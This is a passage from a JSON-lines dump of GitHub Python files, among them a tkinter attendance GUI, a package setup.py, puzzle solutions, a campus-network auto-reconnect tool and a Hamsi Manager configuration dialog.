Image.open(\"Dataset/stop.png\")\r\n image1 = image1.resize((150,150),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n Stop=tk.Button(root, image = test, compound=LEFT)\r\n Stop.image=test\r\n today = date.today()\r\n Stop[\"bg\"] = \"#cc0001\"\r\n Stop[\"borderwidth\"] = \"5px\"\r\n ft = tkFont.Font(family='Times',size=18)\r\n Stop[\"font\"] = ft\r\n Stop[\"fg\"] = \"#ffffff\"\r\n Stop[\"justify\"] = \"center\"\r\n Stop[\"text\"] = \"Save & Stop\"\r\n Stop.place(x=400,y=200,width=300,height=150)\r\n Stop[\"command\"] = lambda : fill_attendance(table_name)\r\n hover(Stop,\"#cc0011\")\r\n\r\n image1 = Image.open(\"Dataset/download.png\")\r\n image1 = image1.resize((100,100),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n Download=tk.Button(root, image = test, compound=LEFT)\r\n Download.image=test\r\n Download[\"bg\"] = \"#ffd700\"\r\n Download[\"borderwidth\"] = \"5px\"\r\n ft = tkFont.Font(family='Times',size=14)\r\n Download[\"font\"] = ft\r\n Download[\"fg\"] = \"#000000\"\r\n Download[\"justify\"] = \"center\"\r\n Download[\"text\"] = \"Download Today's Attendance\"\r\n Download.place(x=180,y=390,width=400,height=100)\r\n Download[\"command\"] = lambda : save_attendance(table_name)\r\n hover(Download,\"#ffd700\")\r\n\r\ndef attendance():\r\n global attendance_list\r\n attendance_list = list(recognize_attendence())\r\n\r\n\r\ndef Back_command(root,table_name, class_name, subject_name,username):\r\n import FacultyMenu as FM\r\n FM.main(root, table_name,class_name, subject_name,username)\r\n\r\ndef Logout_command(root):\r\n answer = askokcancel( title='Logout Confirmation', message='Are You Sure to Logout ?', icon=WARNING)\r\n if answer :\r\n import Welcome as welcome\r\n welcome.main(root)\r\n\r\n\r\ndef Start_command(root):\r\n pass\r\n\r\ndef Stop_command(root):\r\n print(\"command\")\r\n\r\n\r\ndef save_attendance(table_name):\r\n result = download_daily_attendance(table_name,date.today().strftime(\"%d_%m_%Y\"))\r\n\r\n if result == True:\r\n messagebox.showinfo(\"success\", \"Attendace downloaded successfully!!\")\r\n else:\r\n messagebox.showerror(\"error\",\"please contact support team!\")\r\n\r\n\r\n\r\ndef fill_attendance(table_name):\r\n result = mark_attendance(table_name,date.today().strftime(\"%d_%m_%Y\"), attendance_list)\r\n if result == True:\r\n messagebox.showinfo(\"success\", \"Attendace marked successfully!!\")\r\n else:\r\n messagebox.showerror(\"error\",\"please contact support team!\")\r\n","repo_name":"ThePhilosopher4097/Smart_Attendance_System","sub_path":"AttendancePage.py","file_name":"AttendancePage.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73989435253","text":"import os\nfrom argparse import Namespace\n\ntry:\n from setuptools import setup, find_packages\n\n _has_setuptools = True\nexcept ImportError:\n from distutils.core import setup, find_packages\n\nDESCRIPTION = \"cmdbtools: A command line tools for CMDB variant browser.\"\n\nmeta = Namespace(\n __DISTNAME__=\"cmdbtools\",\n __AUTHOR__=\"Shujia Huang\",\n __AUTHOR_EMAIL__=\"huangshujia9@gmail.com\",\n __URL__=\"https://github.com/ShujiaHuang/cmdbtools\",\n __LICENSE__=\"BSD (3-clause)\",\n __DOWNLOAD_URL__=\"https://github.com/ShujiaHuang/cmdbtools\",\n __VERSION__=\"1.1.3\",\n)\n\nif __name__ == \"__main__\":\n THIS_PATH = os.path.abspath(os.path.dirname(__file__))\n long_description = os.path.join(THIS_PATH, \"README.md\")\n\n setup(name=meta.__DISTNAME__,\n version=meta.__VERSION__,\n author=meta.__AUTHOR__,\n author_email=meta.__AUTHOR_EMAIL__,\n maintainer=meta.__AUTHOR__,\n maintainer_email=meta.__AUTHOR_EMAIL__,\n description=DESCRIPTION,\n long_description=(open(long_description).read()),\n long_description_content_type=\"text/markdown\",\n license=meta.__LICENSE__,\n url=meta.__URL__,\n download_url=meta.__URL__,\n packages=find_packages(),\n include_package_data=True,\n install_requires=[\n \"PyYAML>=5.1.2\"\n ],\n entry_points={\n \"console_scripts\": [\n \"cmdbtools = cmdbtools.cmdbtools:main\"\n ]\n },\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Operating System :: POSIX\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: MacOS\"],\n )\n","repo_name":"ShujiaHuang/cmdbtools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"71461716533","text":"import re\n\n\ndef parse_file():\n sensors = {}\n beacons = {}\n with open(\"input.txt\", \"r\") as file:\n for line in file:\n y, x, z, w = [int(_) for _ in re.findall(r'-?\\d+', line.strip())]\n d = abs(y-z) + abs(x-w)\n sensors[(y, x)] = d\n beacons[(z, w)] = True\n return sensors, beacons\n\n\ndef can_reach(sensor: tuple, d, row_y):\n return d > abs(sensor[1] - row_y)\n\n\n# |x1 - x2| + |y1 - y2| = d\n# |s[0] - x| + |s[1] - row_y| = d\n# |s[0] - x| = d - |s[1] - row_y|\n# x = +-(d - |s[1] - row_y|) + s[0]\n# from -(d - |s[1] - row_y|) + s[0] to + (d - |s[1] - row_y|) + s[0]\ndef create_points(s: tuple, d, row_y, beacons, result_set):\n _min_x = -(d - abs(s[1]-row_y)) + s[0]\n _max_x = (d - abs(s[1]-row_y)) + s[0]\n max_x, min_x = max(_min_x, _max_x), min(_min_x, _max_x)\n for i in range(min_x, max_x+1, 1):\n if not beacons.get((i, row_y), False):\n result_set.add((i, row_y))\n\n\ndef create_outer_perimetar(sensor, d, perimetar_set: set, MIN_X, MAX_X):\n min_x, max_x = sensor[0] - d, sensor[0] + d\n min_y, max_y = sensor[1] - d, sensor[1] + d\n test = False\n y1, y2 = sensor[1], sensor[1]\n if y1 >= MIN_X and y1 <= MAX_X:\n if min_x > MIN_X:\n perimetar_set.add((y1, min_x))\n if max_x < MAX_X:\n perimetar_set.add((y1, max_x))\n for x in range(min_x+1, max_x+1):\n if not test:\n y1 = y1 + 1\n y2 = y2 - 1\n if y1 == max_y and y2 == min_y:\n test = True\n else:\n y1 = y1 - 1\n y2 = y2 + 1\n if x < MIN_X or x > MAX_X:\n continue\n else:\n if y1 > MIN_X or y1 < MAX_X:\n perimetar_set.add((y1, x))\n if y2 > MIN_X or y2 < MAX_X:\n perimetar_set.add((y2, x))\n\n\ndef can_sensor_reach(sensor, d, p):\n return d >= abs(sensor[1] - p[1]) + abs(sensor[0] - p[0])\n\n\ndef part_1():\n row_y = 2000000\n sensors, beacons = parse_file()\n result_set = set()\n for sensor, d in sensors.items():\n if can_reach(sensor, d, row_y):\n create_points(sensor, d, row_y, beacons, result_set)\n return len(result_set)\n\n\ndef part_2():\n MIN_X, MAX_X = 0, 4000000\n sensors, beacons = parse_file()\n perimetar_set = set()\n for sensor, d in sensors.items():\n create_outer_perimetar(sensor, d+1, perimetar_set, MIN_X, MAX_X)\n\n perimetar_list = list(perimetar_set)\n\n for x in perimetar_list:\n test = False\n if x[0] < MIN_X or x[1] < MIN_X or x[0] > MAX_X or x[1] > MAX_X:\n continue\n for sensor, d in sensors.items():\n test = test or can_sensor_reach(sensor, d, x)\n if test:\n break\n if not test:\n return x[0]*4000000 + x[1]\n\n\nprint(\"Part 1:\", part_1())\nprint(\"Part 2:\", part_2())\n","repo_name":"HristijanVilos/Advent-of-code-2022","sub_path":"day15/beacon_exclusion_zone.py","file_name":"beacon_exclusion_zone.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74108368054","text":"import sys\n\ndef is_sorted(array):\n \"\"\"\n Check if the given array is sorted in non-decreasing order.\n\n Args:\n - array (list): The input array.\n\n Returns:\n - bool: True if the array is sorted, False otherwise.\n \"\"\"\n return all(array[i] <= array[i + 1] for i in range(len(array) - 1))\n\ndef almost_sorted(arr):\n \"\"\"\n Check if the given array can be almost sorted by either swapping two elements or reversing a subarray.\n\n Args:\n - arr (list): The input array.\n\n Returns:\n - bool: True if the array can be almost sorted, False otherwise.\n \"\"\"\n swap_left = -1\n swap_right = -1\n\n # Find the first occurrence where the array is not sorted.\n for index in range(1, len(arr)):\n if arr[index - 1] > arr[index]:\n swap_left = index - 1\n break\n \n # Find the last occurrence to swap to make the array sorted.\n for index in range(swap_left + 1, len(arr)):\n if index == len(arr) - 1 or arr[index + 1] > arr[swap_left]:\n swap_right = index\n arr[swap_left], arr[swap_right] = arr[swap_right], arr[swap_left]\n break\n \n # Check if the array is sorted after the swap.\n if is_sorted(arr):\n print(\"yes\")\n print(\"swap {} {}\".format(swap_left + 1, swap_right + 1))\n return True\n \n # Undo the swap to explore the next possibility.\n arr[swap_left], arr[swap_right] = arr[swap_right], arr[swap_left]\n \n reverse_left = -1\n reverse_right = -1\n\n # Find the subarray to reverse to make the array sorted.\n for index in range(len(arr) - 1):\n if reverse_left == -1 and arr[index] > arr[index + 1]:\n reverse_left = index\n elif reverse_left != -1 and arr[index] < arr[index + 1]:\n reverse_right = index\n break\n \n # Reverse the subarray and check if the array is sorted.\n to_reverse = arr[reverse_left:reverse_right + 1]\n arr = arr[:reverse_left] + to_reverse[::-1] + arr[reverse_right + 1:]\n \n if is_sorted(arr):\n print(\"yes\")\n print(\"reverse {} {}\".format(reverse_left + 1, reverse_right + 1))\n return True\n \n # If neither swap nor reverse makes the array sorted.\n print(\"no\")\n return False\n\nif __name__ == \"__main__\":\n # Read the size of the array.\n array_size = int(input().strip())\n \n # Read the array elements.\n array_elements = list(map(int, input().strip().split(' ')))\n\n # Check if the array can be almost sorted.\n almost_sorted(array_elements)\n","repo_name":"sarjus/HackerRank-solutions","sub_path":"almostsorted.py","file_name":"almostsorted.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2239301653","text":"'''\n\n 22点18分: 加入bg可用性检查\n 加入扩展账号功能, 并使用base64编解码\n 20点48分: 重连时间2s-3s\n 2022年6月21日14点54分: 去除重复检查(前置ping), 进一步优化重连耗时\n 2022年6月20日10点51分: 优化提示, 新增提示说明框; 测试ReconnWifi-3s\n 2022年6月19日12点10分: 优化状态显示, 精确到1s级\n 2022年6月18日11点42分: 12小时测试重连稳定 (未触发paraerr, 待测\n'''\nimport tkinter,threading,time,base64\nfrom tkinter import messagebox\n\nfrom util import *\nfrom logoData import logodata\n\nMODE = 1\nMODE_DES = ['',\"常规模式\",\"快速模式\"]\n\ndef getInfo(): \n print(\"getinfo\")\n confPath = \".config\"\n \n if os.path.exists(confPath):\n with open(confPath,'r') as f:\n dc = str(base64.b64decode(f.read()),encoding='utf8')\n info = [i.split(\",\") for i in dc.split(\"\\n\")]\n else:\n info = [ \n ('', '')\n ] \n return info\n\nlb_default = \"请选择重连模式(点击可查看详细说明): \"\nlb_explain = \"\"\"本工具仅供学习交流, 请勿用于商业等其他用途\n\n1. 使用说明: \n 1.1 使用流程\n 1.1.1 选择重连模式(非必选项)\n 1.1.2 点击\"开始运行\"\n 1.1.3 程序运行期间, 可保持较好的联网体验\n \n 1.2 本工具依赖csust-bg连接互联网 \n 1.3 当后台检测到掉线时, 会自动断网重连, 一般耗时 3-15s\n \n2. 重连模式介绍:\n 2.1. 常规模式: 比较稳定, 缺点是偶尔重连响应慢。\n 2.2. 快速模式: 采取激进的断开wifi后重新连接的方案, 测试效果良好\"\"\"\n\ndef mouthOn(evt):\n box = messagebox.showinfo(\"使用须知\",message=lb_explain)\n \ndef mouthHover(evt):\n lb_chooseMode.config(text=lb_default,fg=\"blue\")\n\nclass netStatus(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n print(\"状态检测启动...\")\n self.STAT = False\n \n def ping(self):\n COMMAND_PING = \"ping www.baidu.com -n 1 -w 1000\" \n try:\n ans = subprocess.Popen(COMMAND_PING, stdin=-1, stdout=-1,stderr=-1,shell=True)\n ans.wait(1.5)\n self.STAT = ans.poll() == 0\n except:\n self.STAT = False\n \n def run(self):\n while True:\n self.ping()\n time.sleep(1)\n\ndef update_lb_status(api_stat):\n if api_stat:\n api_msg = \"连接正常\"\n api_color = \"#008c00\"\n else:\n api_msg = \"连接异常, 正重��...\"\n api_color = \"yellow\"\n \n msg = time.strftime(\"%H:%M:%S \") + MODE_DES[MODE] + \" \" + api_msg \n lb_status.config(text=msg, bg=api_color)\n\ndef run():\n netstat = netStatus()\n netstat.setDaemon(True)\n \n utils = bg(3, \"connLog.log\", getInfo(), MODE==2)\n utils.setDaemon(True)\n \n netstat.start()\n utils.start()\n \n while True:\n if utils.STAT_CODE == 500:\n lb_status.config(text=\"错误: 当前不在可用范围,请检查后重试\", bg=\"red\") \n return\n update_lb_status(netstat.STAT)\n time.sleep(1)\n\ndef start():\n lb_chooseMode.config(state=tkinter.DISABLED)\n lb_status.config(text=\"初始化中...\")\n btn_start.config(text=\"正在运行中...\",bg=\"white\",state=tkinter.DISABLED)\n radio_button_normal.config(state=tkinter.DISABLED)\n radio_button_quick.config(state=tkinter.DISABLED)\n \n threading.Thread(target=run).start()\n \ndef modchange():\n global MODE\n res = v.get()\n MODE = res\n\n## 配置窗口参数\ntk = tkinter.Tk()\ntk.title(\"csust-bg\")\n\n## 创建临时图标文件\nwith open(\"temp.ico\",'wb') as templogo:\n templogo.write(base64.b64decode(logodata))\ntk.iconbitmap(\"temp.ico\")\nos.remove(\"temp.ico\")\n\nwd_w = 240\nwd_h = 160\nscr_w = tk.winfo_screenwidth()/2\nscr_h = tk.winfo_screenheight()/2\nwd_size = f\"{wd_w}x{wd_h}+{int(scr_w-0.5*wd_w)}+{int(scr_h-0.5*wd_h)}\"\ntk.geometry(wd_size)\ntk.resizable(width=0, height=0)\n\n## 构建 UI\nlb_status = tkinter.Label(tk,text=\"连接状态\",bg=\"#77787b\",width=160)\n\nlb_chooseMode = tkinter.Label(tk,text=\"请选择重连模式: \")\nlb_chooseMode.bind(\"\",mouthHover)\nlb_chooseMode.bind(\"\",mouthOn)\n\nv = tkinter.IntVar() # IntVar() 用于处理整数类型的变量\nradio_button_normal = tkinter.Radiobutton(tk, text = '常规模式', variable = v,value =1,command=modchange)\nradio_button_quick = tkinter.Radiobutton(tk, text = '快速模式', variable = v,value =2,command=modchange)\nradio_button_normal.select()\n\nbtn_start = tkinter.Button(tk,text=\"点击开始\",command=start,width=80,bg=\"#008c00\",fg=\"white\",border=0)\n\nbtn_start.pack(side=\"bottom\")\nlb_status.pack(side=\"top\")\nlb_chooseMode.pack(anchor ='w')\nradio_button_normal.pack(anchor ='w')\nradio_button_quick.pack(anchor ='w')\n\nif __name__ == \"__main__\":\n ## 开始主循环\n tk.mainloop()\n","repo_name":"monicedy/bgnet-GUI-tkinter","sub_path":"csust-bg-tkinter.py","file_name":"csust-bg-tkinter.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34016573024","text":"from Core.MyObjects import *\nfrom Core import Universals as uni\nfrom Core import Dialogs\nfrom Core import Settings\nfrom Core import MyConfigure\nfrom Core import Execute\nimport FileUtils as fu\nfrom Core import ReportBug\n\nMyDialog, MyDialogType, MyParent = getMyDialog()\n\n\nclass Configurator(MyDialog):\n def __init__(self, _page=None):\n MyDialog.__init__(self, MyParent)\n if MyDialogType == \"MDialog\":\n if isActivePyKDE4:\n self.setButtons(MyDialog.NoDefault)\n elif MyDialogType == \"MMainWindow\":\n self.setObjectName(\"Cleaner\")\n setMainWindow(self)\n activePageNo = 0\n if _page == \"configurePage\":\n activePageNo = 2\n elif _page == \"pluginPage\":\n activePageNo = 3\n self.isInstallFinished = False\n self.pageNo, self.pageSize = activePageNo, 4\n self.pnlMain = MWidget(self)\n self.vblMain = MVBoxLayout(self.pnlMain)\n self.hblMain = MHBoxLayout()\n self.lblLeftImage = MLabel()\n self.pmapLeftImage = MPixmap(\"Images:HamsiManager-256x256-1.png\")\n self.lblLeftImage.setPixmap(self.pmapLeftImage)\n self.vblLeftColumn = MVBoxLayout()\n self.vblLeftColumn.addStretch(1)\n self.vblLeftColumn.addWidget(self.lblLeftImage)\n self.vblLeftColumn.addStretch(5)\n self.hblMain.addLayout(self.vblLeftColumn)\n self.pages = []\n for pageNo in range(self.pageSize):\n self.pages.append(self.createPage(pageNo))\n if pageNo != self.pageNo:\n self.pages[-1].setVisible(False)\n self.hblMain.addWidget(self.pages[-1])\n self.vblMain.addLayout(self.hblMain, 20)\n self.hblButtons = MHBoxLayout()\n self.buttons = [MPushButton(translate(\"Reconfigure\", \"Back\")),\n MPushButton(translate(\"Reconfigure\", \"Forward\")),\n MPushButton(translate(\"Reconfigure\", \"Configure\"))]\n self.hblButtons.addStretch(5)\n for btnNo, btn in enumerate(self.buttons):\n if btnNo == len(self.buttons) - 1 or btnNo == 0:\n btn.setVisible(False)\n self.hblButtons.addWidget(btn, 1)\n self.connect(btn, SIGNAL(\"clicked()\"), self.pageChanged)\n self.pbtnCancel = MPushButton(translate(\"Reconfigure\", \"Cancel\"))\n self.pbtnFinish = MPushButton(translate(\"Reconfigure\", \"Finish\"))\n self.pbtnFinish.setVisible(False)\n self.hblButtons.addWidget(self.pbtnCancel, 1)\n self.hblButtons.addWidget(self.pbtnFinish, 1)\n self.connect(self.pbtnCancel, SIGNAL(\"clicked()\"), self.close)\n self.connect(self.pbtnFinish, SIGNAL(\"clicked()\"), self.close)\n self.vblMain.addLayout(self.hblButtons)\n self.pageChanged(True)\n if MyDialogType == \"MDialog\":\n if isActivePyKDE4:\n self.setMainWidget(self.pnlMain)\n else:\n self.setLayout(self.vblMain)\n elif MyDialogType == \"MMainWindow\":\n self.setCentralWidget(self.pnlMain)\n moveToCenter(self)\n self.setWindowTitle(translate(\"Reconfigure\", \"Hamsi Manager Configurator\") + \" \" + uni.version)\n self.setWindowIcon(MIcon(\"Images:hamsi.png\"))\n self.setMinimumWidth(650)\n self.setMinimumHeight(350)\n self.show()\n\n def closeEvent(self, _event):\n if self.isInstallFinished is False:\n answer = Dialogs.ask(translate(\"Reconfigure\", \"Finalizing Configuration\"),\n translate(\"Reconfigure\", \"Are You Sure You Want To Quit?\"))\n if answer != Dialogs.Yes:\n _event.ignore()\n MApplication.setQuitOnLastWindowClosed(True)\n\n def createPage(self, _pageNo):\n pnlPage = MWidget()\n HBox = MHBoxLayout()\n pnlPage.setLayout(HBox)\n defaultLangCode = uni.getDefaultLanguageCode()\n if _pageNo == 0:\n if fu.isFile(fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"About_\" + defaultLangCode)):\n aboutFileContent = fu.readFromFile(\n fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"About_\" + defaultLangCode), \"utf-8\")\n else:\n aboutFileContent = fu.readFromFile(fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"About_en_GB\"),\n \"utf-8\")\n lblAbout = MLabel(str(aboutFileContent))\n lblAbout.setWordWrap(True)\n HBox.addWidget(lblAbout)\n elif _pageNo == 1:\n if fu.isFile(fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"License_\" + defaultLangCode)):\n licenceFileContent = fu.readFromFile(\n fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"License_\" + defaultLangCode), \"utf-8\")\n else:\n licenceFileContent = fu.readFromFile(\n fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"License_en_GB\"), \"utf-8\")\n teCopying = MTextEdit()\n teCopying.setPlainText(str(licenceFileContent))\n HBox.addWidget(teCopying)\n elif _pageNo == 2:\n VBox = MVBoxLayout()\n VBox.addStretch(10)\n self.isCreateDesktopShortcut = None\n self.isCreateExecutableLink = None\n self.wAvailableModules = MWidget(self)\n VBox.addWidget(self.wAvailableModules)\n self.vblAvailableModules = MVBoxLayout()\n self.checkAvailableModules()\n VBox.addStretch(1)\n if uni.isRunningAsRoot():\n self.isCreateExecutableLink = MCheckBox(translate(\"Reconfigure\", \"Add To The System\"))\n self.isCreateExecutableLink.setCheckState(Mt.Checked)\n lblExecutableLink = MLabel(translate(\"Reconfigure\", \"Executable Link Path : \"))\n self.leExecutableLink = MLineEdit(\n str(Settings.getUniversalSetting(\"HamsiManagerExecutableLinkPath\", \"/usr/bin/hamsi\")))\n self.connect(self.isCreateExecutableLink, SIGNAL(\"stateChanged(int)\"), self.createExecutableLinkChanged)\n VBox.addWidget(self.isCreateExecutableLink)\n HBox1 = MHBoxLayout()\n HBox1.addWidget(lblExecutableLink)\n HBox1.addWidget(self.leExecutableLink, 10)\n VBox.addLayout(HBox1)\n else:\n self.isCreateDesktopShortcut = MCheckBox(translate(\"Reconfigure\", \"Create Desktop Shortcut.\"))\n self.isCreateDesktopShortcut.setCheckState(Mt.Checked)\n VBox.addWidget(self.isCreateDesktopShortcut)\n VBox.addStretch(10)\n HBox.addLayout(VBox)\n elif _pageNo == 3:\n import MyPlugins\n\n VBox = MVBoxLayout()\n VBox.addStretch(10)\n wPlugins = MyPlugins.MyPluginsForSystem(self)\n HBox.addWidget(wPlugins)\n VBox.addStretch(10)\n HBox.addLayout(VBox)\n return pnlPage\n\n def createExecutableLinkChanged(self, _value):\n if _value == 0:\n self.leExecutableLink.setEnabled(False)\n else:\n self.leExecutableLink.setEnabled(True)\n\n def checkAvailableModules(self):\n try:\n mutagenIsAvailable = False\n eyeD3IsAvailable = False\n mysqlIsAvailable = False\n musicbrainzIsAvailable = False\n scintillaIsAvailable = False\n pywin32IsAvailable = False\n beautifulsoup4IsAvailable = False\n try:\n from mutagen import id3\n from mutagen import mp3\n\n mutagenIsAvailable = True\n except: pass\n try:\n import eyed3\n\n eyeD3IsAvailable = True\n except: pass\n if not uni.isWindows:\n try:\n import _mysql as mdb\n\n mysqlIsAvailable = True\n except: pass\n try:\n from musicbrainz2 import webservice, model, utils\n from musicbrainz2.webservice import Query, ArtistFilter, WebServiceError, ReleaseFilter, TrackFilter\n\n musicbrainzIsAvailable = True\n except: pass\n try:\n from PyQt4.Qsci import QsciScintilla\n\n scintillaIsAvailable = True\n except: pass\n try:\n try:\n from bs4 import BeautifulSoup\n except:\n from BeautifulSoup import BeautifulSoup\n\n beautifulsoup4IsAvailable = True\n except: pass\n if uni.isWindows:\n try:\n import win32api, win32con, win32com\n\n pywin32IsAvailable = True\n except: pass\n\n clearAllChildren(self.wAvailableModules)\n\n if mutagenIsAvailable is False:\n lblMutagen = MLabel(translate(\"Reconfigure\",\n \"'mutagen' (python-mutagen) named module has NOT installed in your system.\"))\n lblMutagen.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblMutagen)\n if eyeD3IsAvailable is False:\n lblEyeD3 = MLabel(translate(\"Reconfigure\",\n \"'eyeD3' (python-eyed3) named module has NOT installed in your system.\"))\n lblEyeD3.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblEyeD3)\n if not uni.isWindows and mysqlIsAvailable is False:\n lblMysql = MLabel(translate(\"Reconfigure\",\n \"'MySQL' (python-mysql) named module has NOT installed on your system.\"))\n lblMysql.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblMysql)\n if musicbrainzIsAvailable is False:\n lblMusicbrainz = MLabel(translate(\"Reconfigure\",\n \"'Music Brainz' (python-musicbrainz2) named module has NOT installed on your system.\"))\n lblMusicbrainz.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblMusicbrainz)\n if scintillaIsAvailable is False:\n lblScintilla = MLabel(translate(\"Reconfigure\",\n \"'QScintilla' (python-qt4-qscintilla) named module has NOT installed on your system.\"))\n lblScintilla.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblScintilla)\n if uni.isWindows:\n if pywin32IsAvailable is False:\n lblPywin32 = MLabel(translate(\"Reconfigure\",\n \"'Python for Windows Extensions' (pywin32) named module has NOT installed on your system.\"))\n lblPywin32.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblPywin32)\n if beautifulsoup4IsAvailable is False:\n lblBeautifulsoup4 = MLabel(translate(\"Reconfigure\",\n \"'beautifulsoup4' / 'bs4' (python-beautifulsoup4) named module has NOT installed in your system.\"))\n lblBeautifulsoup4.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblBeautifulsoup4)\n\n if (mutagenIsAvailable is False or eyeD3IsAvailable is False or\n (not uni.isWindows and mysqlIsAvailable is False) or\n musicbrainzIsAvailable is False or scintillaIsAvailable is False or\n (uni.isWindows and (pywin32IsAvailable is False)) or\n beautifulsoup4IsAvailable is False):\n lblAlert = MLabel(translate(\"Reconfigure\",\n \"You have to install above modules to use some features.
If you don't want to use all features, you can continue without these modules.
\"))\n self.vblAvailableModules.addWidget(lblAlert)\n btnCheckAvailableModules = MPushButton(translate(\"Reconfigure\", \"Check Again\"))\n self.vblAvailableModules.addWidget(btnCheckAvailableModules)\n self.connect(btnCheckAvailableModules, SIGNAL(\"clicked()\"), self.checkAvailableModules)\n\n self.wAvailableModules.setLayout(self.vblAvailableModules)\n except:\n ReportBug.ReportBug()\n\n def pageChanged(self, _isRunningManual=False):\n try:\n senderObject = None\n if _isRunningManual is False:\n senderObject = self.sender()\n if senderObject == self.buttons[1]:\n self.pageNo += 1\n elif senderObject == self.buttons[0]:\n self.pageNo -= 1\n elif senderObject == self.buttons[2]:\n self.pageNo += 1\n for pageNo, pnlPage in enumerate(self.pages):\n if pageNo != self.pageNo:\n pnlPage.setVisible(False)\n else:\n pnlPage.setVisible(True)\n self.buttons[0].setVisible(False)\n self.buttons[1].setVisible(False)\n self.buttons[2].setVisible(False)\n self.buttons[1].setText(translate(\"Reconfigure\", \"Forward\"))\n if self.pageNo == 0:\n self.buttons[1].setVisible(True)\n elif self.pageNo == 1:\n self.buttons[1].setVisible(True)\n self.buttons[1].setText(translate(\"Reconfigure\", \"Accept\"))\n elif self.pageNo == 2:\n self.buttons[0].setVisible(False)\n self.buttons[1].setVisible(False)\n self.buttons[2].setVisible(True)\n self.pbtnCancel.setVisible(True)\n elif self.pageNo == 3:\n self.buttons[0].setVisible(False)\n self.buttons[1].setVisible(False)\n self.buttons[2].setVisible(False)\n self.pbtnCancel.setVisible(False)\n self.pbtnFinish.setVisible(True)\n self.isInstallFinished = True\n if _isRunningManual is False:\n if senderObject == self.buttons[2]:\n self.reConfigure()\n except:\n ReportBug.ReportBug()\n\n def reConfigure(self):\n try:\n oldPathOfExecutableHamsi = Settings.getUniversalSetting(\"HamsiManagerExecutableLinkPath\", \"/usr/bin/hamsi\")\n if fu.isFile(fu.joinPath(fu.HamsiManagerDirectory, \"HamsiManager.desktop\")):\n if fu.isWritableFileOrDir(fu.joinPath(fu.HamsiManagerDirectory, \"HamsiManager.desktop\")):\n MyConfigure.reConfigureFile(fu.joinPath(fu.HamsiManagerDirectory, \"HamsiManager.desktop\"))\n if self.isCreateDesktopShortcut is not None:\n if self.isCreateDesktopShortcut.checkState() == Mt.Checked:\n desktopPath = uni.getUserDesktopPath()\n if uni.isWindows:\n MyConfigure.createShortCutFile(fu.joinPath(desktopPath, \"Hamsi Manager.lnk\"))\n else:\n fileContent = MyConfigure.getConfiguredDesktopFileContent()\n fu.writeToFile(fu.joinPath(desktopPath, \"HamsiManager.desktop\"), fileContent)\n if uni.isRunningAsRoot():\n executableLink = str(self.leExecutableLink.text())\n if self.isCreateExecutableLink is not None:\n if self.isCreateExecutableLink.checkState() == Mt.Checked:\n if executableLink.strip() != \"\":\n HamsiManagerFileName = Execute.findExecutableBaseName(\"HamsiManager\")\n if fu.isFile(executableLink):\n fu.removeFileOrDir(executableLink)\n fu.createSymLink(fu.joinPath(fu.HamsiManagerDirectory, HamsiManagerFileName),\n executableLink)\n Settings.setUniversalSetting(\"HamsiManagerExecutableLinkPath\", executableLink)\n if oldPathOfExecutableHamsi != executableLink:\n if fu.isFile(oldPathOfExecutableHamsi):\n answer = Dialogs.ask(translate(\"Reconfigure\", \"Other Hamsi Manager Was Detected\"),\n str(translate(\"Reconfigure\",\n \"Other Hamsi Manager executable file was detected. Are you want to delete old executable file? You can delete this old executable file : \\\"%s\\\"\")) % (\n oldPathOfExecutableHamsi))\n if answer != Dialogs.Yes:\n fu.removeFile(oldPathOfExecutableHamsi)\n if fu.isDir(\"/usr/share/applications/\"):\n fileContent = MyConfigure.getConfiguredDesktopFileContent()\n fu.writeToFile(\"/usr/share/applications/HamsiManager.desktop\", fileContent)\n if uni.isRunningAsRoot() is False:\n if fu.isDir(fu.joinPath(fu.userDirectoryPath, \".local\", \"applications\")) is False:\n fu.makeDirs(fu.joinPath(fu.userDirectoryPath, \".local\", \"applications\"))\n fileContent = MyConfigure.getConfiguredDesktopFileContent()\n fu.writeToFile(fu.joinPath(fu.userDirectoryPath, \".local\", \"applications\", \"HamsiManager.desktop\"),\n fileContent)\n MyConfigure.installKDE4Languages()\n self.isInstallFinished = True\n except:\n ReportBug.ReportBug()\n \n \n \n","repo_name":"supermurat/hamsi-manager","sub_path":"Tools/Configurator.py","file_name":"Configurator.py","file_ext":"py","file_size_in_byte":18302,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"16009433088","text":"import datetime\nimport time\nfrom collections import namedtuple\nimport json\nimport findspark\nfindspark.init()\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.conf import SparkConf\nfrom pyspark.sql import 